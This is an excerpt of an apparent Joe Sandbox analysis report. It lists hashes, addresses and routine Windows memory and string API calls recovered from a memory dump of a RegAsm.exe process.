                                                                                                                          • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                          • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 726966127-0
                                                                                                                          • Opcode ID: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                          • Opcode Fuzzy Hash: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 726966127-0
                                                                                                                          • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                          • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3669619086-0
                                                                                                                          • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                          • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1033339047-0
                                                                                                                          • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                          • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2605342592-0
                                                                                                                          • Opcode ID: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                          • Opcode Fuzzy Hash: e8014e3e073e3038f16ce65d63843526aeb3a562c6a088246885bee1c6057e7d
                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5